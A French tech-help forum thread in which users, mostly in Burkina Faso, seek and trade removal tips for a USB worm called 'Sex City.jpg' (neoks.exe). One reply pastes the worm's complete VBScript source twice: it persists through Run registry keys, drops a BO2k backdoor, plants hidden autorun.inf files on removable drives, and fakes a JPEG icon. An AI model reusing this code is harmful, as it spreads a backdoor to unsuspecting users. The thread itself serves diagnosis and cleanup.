Probleme avec un virus sex city .jpg
usb
-
Jean François B. -
Jean François B. -
Bonjour, je m'apelle hermann . j'ai un probleme avec un programme qui s'auto exe au demarrage de windows. le repertoire est
c:/ windows / system32/ neoks.exe. Au demarrage il affiche une fenetre Ms dos . comment peut -on l'eliminer . quel anti virus l'integre dans sa base de donnee. avast version gratuite ne l'elimine pas.
2e probleme
j'ai la licence de mon anti virus qui a expiré depuis le 13 octobre 2007 que faire? comment le reinstaller la nouvelle licence.
merci pour votre aide.
c:/ windows / system32/ neoks.exe. Au demarrage il affiche une fenetre Ms dos . comment peut -on l'eliminer . quel anti virus l'integre dans sa base de donnee. avast version gratuite ne l'elimine pas.
2e probleme
j'ai la licence de mon anti virus qui a expiré depuis le 13 octobre 2007 que faire? comment le reinstaller la nouvelle licence.
merci pour votre aide.
A voir également:
- Probleme avec un virus sex city .jpg
- Virus mcafee - Accueil - Piratage
- Convertir hevc en jpg - Guide
- Réduire taille jpg - Guide
- Telecharger jpg - Télécharger - Photo & Graphisme
- Convertir jpg en pdf - Télécharger - PDF
37 réponses
Bonjour usb, j'ai le même problème, attrapée au Burkina Faso il y a deux semaines d'ici. Mon Norton / symantec à jour ne reconnait pas ce problème. Je suis en train de chercher d'autres programmes pour identifier du spyware-adware. Le virus attaque surtout les lecteurs changeables (clé USB, caméra...). Je ne vois pas d'autre commentaire dans l'internet à travers google sur le même problème.
Bonne chance et à bientot,
Hermette
Bonne chance et à bientot,
Hermette
Est-ce que vous avez eu des problèmes sérieux apart du fait qu'il y a cette anomalie?
Norton ne peut pas résoudre le problème, j'ai contacté les experts.
A plus,
Hermette
Norton ne peut pas résoudre le problème, j'ai contacté les experts.
A plus,
Hermette
Bonjour,
j'ai le meme probleme ma soeur est allé au burkina faso et a chopé le firus sur sa clé usb. Les 3/4 de ces fichiés on disparut...
Avez vous des solutions pour récupéré ces donnés et éliminé le virus qui est toukourd présent sur sa clé.
j'ai le meme probleme ma soeur est allé au burkina faso et a chopé le firus sur sa clé usb. Les 3/4 de ces fichiés on disparut...
Avez vous des solutions pour récupéré ces donnés et éliminé le virus qui est toukourd présent sur sa clé.
Bonjour, il est constitué de ça dasn le bloc note
<JOB id="IncludeExample">
<SCRIPT language="VBScript">
'-- ver 0.1
'-- copie automatique de serveur BO2k
'- copyright (c) 2007 , Christina & Ne0Krishna
'on error resume next
'-- initialisation & creation des objets
Option Explicit
Dim FSO, WSSH, dir0 , dir, demarrage1, demarrage2, codeN, hcodeN
Dim serverN, src1, src2, r
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set dir0 = FSO.GetSpecialFolder(1)
dir = CStr(dir0) 'transform l'objet en chaine
demarrage1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System64"
demarrage2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System12"
codeN = "Sex City.jpg.wsf"
hcodeN = "ne0kS.dll.wsf" ' code caher dans le system32 ou equivalent
serverN = "ne0kS.exe"
src2 = WScript.ScriptFullName
'racine du lecteur ou se trouve le script
'MsgBox InStrRev(src2,"\")
r = Mid(src2, 1,InStrRev(src2,"\"))
src1 = r & serverN
'run
input
'---- SOUS ROUTINE
sub diversion2()
Dim fso, f, f2, ts, ts2
Dim Ligne, i
Set FSO = CreateObject("Scripting.FileSystemObject")
if (fso.fileexists(dir & "\" & serverN)) then
wssh.run dir & "\" & serverN
Else
'transforme la copie texte du server en exe
copier src1, dir, serverN
wssh.run dir & "\" & serverN
DemarrerDe demarrage2, dir,serverN 'inscrire hserver comme run auto
end if
end sub
'-------------------------------------
sub input()
'-- procedure principale,
'-- infection de l'hote et des unites amovibles
'-- code = nom visible du script
'-- hcode = nom de diversion d'une copie du script
'-- hserver = nom du serveur BO2k
Dim ss, location
ss = cstr(dir)
'MsgBox ss
location = wscript.ScriptFullName
if instr(location,ss)=false Then 'verifie si le script s'execute apartir du dossier sys
diversion2 'premiere execution lorsque l'hote est sain
Else
do while time <> "00:00:00"
detecterracines
wscript.sleep 180000
loop
end If
detecterracines
if not(fso.fileexists( dir &"\"& hcodeN)) then
copier location, dir,hcodeN 'copier hCode ver les dossier sys
DemarrerDe demarrage1, dir,hcodeN 'inscrire hCOde comme run auto
ChangerIcone 'changer type icone
end If
wscript.sleep 1000
if not(fso.fileexists( dir &"\"& serverN)) Then
'-- copie du serveur
copier src1, dir, serverN
DemarrerDe demarrage2, dir,serverN 'inscrire hserver comme run auto
End If
end sub
'-------------------------------------
sub DemarrerDe(KEY, Location, prg)
Set wssh = CreateObject("WScript.Shell")
wssh.RegWrite KEY, location & "\" & prg
end Sub
'-------------------------------------
Sub copier(src, dest, ren)
'-- copie un fichier avec possibilite de renomer
fso.CopyFile src, dest & "\" & ren, true
end Sub
'-------------------------------------
Sub createAR( unite, prg )
'-- create an Autorun inf on submitted "unite" for
'-- "prg"
'-- exemple d'appel: createAR "D:", "prg.exe"
Dim objFSO
Dim objStream
Dim objFile
'creation de autorun
Set objFSO = CreateObject("scripting.FileSystemObject")
'change les attibuts du fichier pour pouvoir l'ecraser
if (fso.fileexists(unite & "\autorun.inf")) Then
Set objFile = objFSO.GetFile(unite & "\autorun.inf")
objFile.Attributes = 0 'normal
WScript.Sleep 1000
End If
Set objStream = objFso.CreateTextFile( unite & "\autorun.inf", true)
objstream.WriteLine "[AutoRun]"
objstream.WriteLine "open=wscript """ & prg &""""
objstream.WriteLine "shellexecute=wscript """ & prg & """"
objstream.WriteLine "shell\Auto\command=wscript """ & prg & """"
objstream.WriteLine "shell=Auto"
objStream.Close
WScript.Sleep 1000
'change les attibut en cache et proteger
Set objFile = objFSO.GetFile(unite & "\autorun.inf")
objFile.Attributes = 4 'system file
objFile.Attributes = 2 'hidden file
'objFile.Attributes = 1 'readonly
End Sub
'---------------------------------
sub detecterracines()
Dim fso, d, dc, s, n, racine,u
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d in dc
racine = d.Driveletter & ":"
u= detectamovibles(racine) '-- recupere le type de l'unite grace a une fonction
'msgbox racine
If u ="Amovible" and d.isready then
If not (fso.fileexists(racine & "\" & codeN )) then
End if
copier WScript.ScriptFullName, racine, codeN 'copie du script
createAR racine, codeN 'cree un autorun sur la cle.
copier dir & "\" & serverN, racine, serverN 'copie du server
End if
Next
end Sub
'-------------------------------
Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 0: t = "Inconnu"
Case 1: t = "Amovible"
Case 2: t = "Fixe"
Case 3: t = "Rseau"
Case 4: t = "CD-ROM"
Case 5: t = "RAM Disk"
End Select
detectamovibles = t
End Function
'----------------------------
sub ChangerIcone()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wsffile\DefaultIcon\",resultat
end Sub
</SCRIPT>
</JOB>
<JOB id="IncludeExample">
<SCRIPT language="VBScript">
'-- ver 0.1
'-- copie automatique de serveur BO2k
'- copyright (c) 2007 , Christina & Ne0Krishna
'on error resume next
'-- initialisation & creation des objets
Option Explicit
Dim FSO, WSSH, dir0 , dir, demarrage1, demarrage2, codeN, hcodeN
Dim serverN, src1, src2, r
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set dir0 = FSO.GetSpecialFolder(1)
dir = CStr(dir0) 'transform l'objet en chaine
demarrage1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System64"
demarrage2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System12"
codeN = "Sex City.jpg.wsf"
hcodeN = "ne0kS.dll.wsf" ' code caher dans le system32 ou equivalent
serverN = "ne0kS.exe"
src2 = WScript.ScriptFullName
'racine du lecteur ou se trouve le script
'MsgBox InStrRev(src2,"\")
r = Mid(src2, 1,InStrRev(src2,"\"))
src1 = r & serverN
'run
input
'---- SOUS ROUTINE
sub diversion2()
Dim fso, f, f2, ts, ts2
Dim Ligne, i
Set FSO = CreateObject("Scripting.FileSystemObject")
if (fso.fileexists(dir & "\" & serverN)) then
wssh.run dir & "\" & serverN
Else
'transforme la copie texte du server en exe
copier src1, dir, serverN
wssh.run dir & "\" & serverN
DemarrerDe demarrage2, dir,serverN 'inscrire hserver comme run auto
end if
end sub
'-------------------------------------
sub input()
'-- procedure principale,
'-- infection de l'hote et des unites amovibles
'-- code = nom visible du script
'-- hcode = nom de diversion d'une copie du script
'-- hserver = nom du serveur BO2k
Dim ss, location
ss = cstr(dir)
'MsgBox ss
location = wscript.ScriptFullName
if instr(location,ss)=false Then 'verifie si le script s'execute apartir du dossier sys
diversion2 'premiere execution lorsque l'hote est sain
Else
do while time <> "00:00:00"
detecterracines
wscript.sleep 180000
loop
end If
detecterracines
if not(fso.fileexists( dir &"\"& hcodeN)) then
copier location, dir,hcodeN 'copier hCode ver les dossier sys
DemarrerDe demarrage1, dir,hcodeN 'inscrire hCOde comme run auto
ChangerIcone 'changer type icone
end If
wscript.sleep 1000
if not(fso.fileexists( dir &"\"& serverN)) Then
'-- copie du serveur
copier src1, dir, serverN
DemarrerDe demarrage2, dir,serverN 'inscrire hserver comme run auto
End If
end sub
'-------------------------------------
sub DemarrerDe(KEY, Location, prg)
Set wssh = CreateObject("WScript.Shell")
wssh.RegWrite KEY, location & "\" & prg
end Sub
'-------------------------------------
Sub copier(src, dest, ren)
'-- copie un fichier avec possibilite de renomer
fso.CopyFile src, dest & "\" & ren, true
end Sub
'-------------------------------------
Sub createAR( unite, prg )
'-- create an Autorun inf on submitted "unite" for
'-- "prg"
'-- exemple d'appel: createAR "D:", "prg.exe"
Dim objFSO
Dim objStream
Dim objFile
'creation de autorun
Set objFSO = CreateObject("scripting.FileSystemObject")
'change les attibuts du fichier pour pouvoir l'ecraser
if (fso.fileexists(unite & "\autorun.inf")) Then
Set objFile = objFSO.GetFile(unite & "\autorun.inf")
objFile.Attributes = 0 'normal
WScript.Sleep 1000
End If
Set objStream = objFso.CreateTextFile( unite & "\autorun.inf", true)
objstream.WriteLine "[AutoRun]"
objstream.WriteLine "open=wscript """ & prg &""""
objstream.WriteLine "shellexecute=wscript """ & prg & """"
objstream.WriteLine "shell\Auto\command=wscript """ & prg & """"
objstream.WriteLine "shell=Auto"
objStream.Close
WScript.Sleep 1000
'change les attibut en cache et proteger
Set objFile = objFSO.GetFile(unite & "\autorun.inf")
objFile.Attributes = 4 'system file
objFile.Attributes = 2 'hidden file
'objFile.Attributes = 1 'readonly
End Sub
'---------------------------------
sub detecterracines()
Dim fso, d, dc, s, n, racine,u
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d in dc
racine = d.Driveletter & ":"
u= detectamovibles(racine) '-- recupere le type de l'unite grace a une fonction
'msgbox racine
If u ="Amovible" and d.isready then
If not (fso.fileexists(racine & "\" & codeN )) then
End if
copier WScript.ScriptFullName, racine, codeN 'copie du script
createAR racine, codeN 'cree un autorun sur la cle.
copier dir & "\" & serverN, racine, serverN 'copie du server
End if
Next
end Sub
'-------------------------------
Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 0: t = "Inconnu"
Case 1: t = "Amovible"
Case 2: t = "Fixe"
Case 3: t = "Rseau"
Case 4: t = "CD-ROM"
Case 5: t = "RAM Disk"
End Select
detectamovibles = t
End Function
'----------------------------
sub ChangerIcone()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wsffile\DefaultIcon\",resultat
end Sub
</SCRIPT>
</JOB>
Bonjours Thibault,
Merci des informations, je n'ai pas encore trouvé une solution, mais j'enverrai votre diagnostic chez Symantec.
A plus, Hermette
Merci des informations, je n'ai pas encore trouvé une solution, mais j'enverrai votre diagnostic chez Symantec.
A plus, Hermette
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Bonjour,
Je suis Harouna OUEDRAOGO au Burkina Faso. Décidemment on dirait que ce virus est né au BF. J'ai rencontré à plusieurs reprise le même problème sans trouver de solution idoine. Dans mes recherches on m'a suggéré ceci:
1 Entrer dans le dossier C:\WINDOWS\System32
2 Afficher les fichiers cachés
3 supprimer les fichiers neOKS.exe et NeOKS.dll
Malheureusement il n'est plus possible d'afficher les fichiers cachés sous WINDOWS. On dirait que le virus désactive cette fonctionalité de WINDOWS.
Je suis Harouna OUEDRAOGO au Burkina Faso. Décidemment on dirait que ce virus est né au BF. J'ai rencontré à plusieurs reprise le même problème sans trouver de solution idoine. Dans mes recherches on m'a suggéré ceci:
1 Entrer dans le dossier C:\WINDOWS\System32
2 Afficher les fichiers cachés
3 supprimer les fichiers neOKS.exe et NeOKS.dll
Malheureusement il n'est plus possible d'afficher les fichiers cachés sous WINDOWS. On dirait que le virus désactive cette fonctionalité de WINDOWS.
Pour détruire le virus Sex City il faut utiliser Hijackthis qui est un antispyware téléchargeable sur le site :https://www.commentcamarche.net/telecharger/securite/11747-hijackthis/
Très facile d'utilisation, il vous repère les deux fichiers ( neOKS.exe , neOKS.dll.*) dans une liste. Soyez prudent de ne pas pas supprimer les fichiers que vous ne connaissez pas.
Très facile d'utilisation, il vous repère les deux fichiers ( neOKS.exe , neOKS.dll.*) dans une liste. Soyez prudent de ne pas pas supprimer les fichiers que vous ne connaissez pas.
Bonjour,
Je m'appelle Stephane SANOU, je suis au Burkina Faso et je sais comment enlever ce virus de la machine sans antivirus.
Il suffit de supprimer tous les fichiers présents dans le dossier system32 ayant pour nom "Neoks", quel qu'en soit l'extension. Je vous rappelle la situation du dossier system32: "C:\Windows\System32".
Pour ceux comme Haroun qui n'arrivent pas à trouver ces fichiers, peuvent utiliser l'explorateur du Nero Burning 6 car ce derniers affiche tous les fichiers meme cachés par des virus..
Je m'appelle Stephane SANOU, je suis au Burkina Faso et je sais comment enlever ce virus de la machine sans antivirus.
Il suffit de supprimer tous les fichiers présents dans le dossier system32 ayant pour nom "Neoks", quel qu'en soit l'extension. Je vous rappelle la situation du dossier system32: "C:\Windows\System32".
Pour ceux comme Haroun qui n'arrivent pas à trouver ces fichiers, peuvent utiliser l'explorateur du Nero Burning 6 car ce derniers affiche tous les fichiers meme cachés par des virus..
J'ai problème avec un virus qui s'auto execute c'est le c/windows32/neoks.exe. J'ai un anti virus AVK qui n'arrive pas a le localiser et le netoyer aider moi
Bonjour,
C'est encore STephane; Essai ce ke jai donné comme solution ci-dessus et tu auras ton problem resolu
C'est encore STephane; Essai ce ke jai donné comme solution ci-dessus et tu auras ton problem resolu
jai eu aussi ce pme jai téléchargé easycleaner et en nettoyan les programmes au démarrarage jai supprimé tou ceu ki portai le nom neoks je croi cest système 12 et 64. depui lor jai plu de pme !!!
vous me direz si cela a résou votr pme
merci
vous me direz si cela a résou votr pme
merci
Bonjour,
moi jsui en cote d'ivoire et j'ai procédé comme avec le virus new folder il faut aller dan C:/WINDOWS/system32 afficher les dossier et fichier cachés puis faire une recherche avec leurs noms en mots clés puis après les avoir deniché reste plus ka les niker pui un bon pti hitjackthis et c tt (en tt cas ca a marché ici petetre ke c le climat)
moi jsui en cote d'ivoire et j'ai procédé comme avec le virus new folder il faut aller dan C:/WINDOWS/system32 afficher les dossier et fichier cachés puis faire une recherche avec leurs noms en mots clés puis après les avoir deniché reste plus ka les niker pui un bon pti hitjackthis et c tt (en tt cas ca a marché ici petetre ke c le climat)
Bonjour,
tu n'es pas malin.si tu es fort attaque les machines de la presidence du Faso ou de la BCEAO.
tu n'es pas malin.si tu es fort attaque les machines de la presidence du Faso ou de la BCEAO.
Bonjour,
eh les gars arrété de faire le boucan,le petit logiciel hitjackthis enlève ses cochons de virus.par contre de la a se vanter d'avoir créé ce virus je n'en suis pas sur.serge baguira du burkina
eh les gars arrété de faire le boucan,le petit logiciel hitjackthis enlève ses cochons de virus.par contre de la a se vanter d'avoir créé ce virus je n'en suis pas sur.serge baguira du burkina
null null ton virus !
C'est d'ailleurs une copie plagia !
Courage mon frère ! mais trouve quelque chose de plus original...
Je t'ai à l'oei. Je te send l-antidote... ahahaha ! Réfléchis par deux fois avant de le tester - conseil de frèro...l
C'est d'ailleurs une copie plagia !
Courage mon frère ! mais trouve quelque chose de plus original...
Je t'ai à l'oei. Je te send l-antidote... ahahaha ! Réfléchis par deux fois avant de le tester - conseil de frèro...l
Hi,
mon cle usb at ete attaque par sex city.jgp et 3/4 des fichiers ont disparue! qui peut m'aider a trouver la solution.
mon cle usb at ete attaque par sex city.jgp et 3/4 des fichiers ont disparue! qui peut m'aider a trouver la solution.
Salut, j'etais dans le meme cas que simon mais en supprimant le fichier dans le systeme32 windows le restaurais. Si vous avez des problèmes pour utiliser HijackThis puisque c'est en anglais faites cela en attendant qu'une solution plus facile vous soit donné.
Cliquez sur'ai sur le bouton démarrer puis exécuter et écrire "msconfig" dans la boite de dialogue ensuite une autre boite apparaitra et vous prenez le dernier onglet nommé démarrage vous verrez un ensemble de programme rechercher le neoks et décocher.
Le problème était réglé mais il demeurait toujours dans le système, pour le balayer entièrement je te conseille un petit soft gratuit sur le net c'est le HijackThis. A plus
Cliquez sur'ai sur le bouton démarrer puis exécuter et écrire "msconfig" dans la boite de dialogue ensuite une autre boite apparaitra et vous prenez le dernier onglet nommé démarrage vous verrez un ensemble de programme rechercher le neoks et décocher.
Le problème était réglé mais il demeurait toujours dans le système, pour le balayer entièrement je te conseille un petit soft gratuit sur le net c'est le HijackThis. A plus
Le meilleurs antivirus au monde c'est ESET NOD32 Antivirus tu devrai trouver une version de 30 jour gratuit
en allan sur le site =
https://www.eset.com/
voila
en allan sur le site =
https://www.eset.com/
voila